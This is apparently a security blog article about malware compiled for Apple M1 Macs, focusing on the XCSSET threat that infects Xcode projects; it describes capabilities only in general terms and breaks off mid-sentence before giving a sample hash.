Good old malware for the new Apple Silicon platform

Good old malware for the new Apple Silicon platform


A short while ago, Apple released Mac computers with the new chip called Apple M1. The unexpected release was a milestone in the Apple hardware industry. However, as technology evolves, we also observe a growing interest in the newly released platform from malware adversaries. This inevitably leads us to new malware samples compiled for the Apple Silicon platform. In this article, we are going to take a look at threats for Macs with the Apple M1 chip on board. Also, we prepared a short F.A.Q. section at the end of the article for those who want to understand better the security risks of M1 malware. Let’s dive in.

XCSSET malware

Last year, a threat called XCSSET was discovered for the first time. It targets mainly Mac developers using a unique way of distribution: injecting a malicious payload into Xcode IDE projects on the victim’s Mac. This payload will be executed at the time of building project files in Xcode. XCSSET modules have numerous capabilities, such as:

Reading and dumping Safari cookies,
Injecting malicious JavaScript code into various websites,
Stealing user files and information from applications, such as Notes, WeChat, Skype, Telegram, etc.,
Encrypting user files.

All these various features, in combination with high stealth and an unusual way of distribution, make XCSSET a dangerous threat for Mac computers.

While exploring the various executable modules of XCSSET, we found out that some of them also contained samples compiled specially for new Apple Silicon chips. For example, a sample with the MD5 hash sum malware apple silicon platform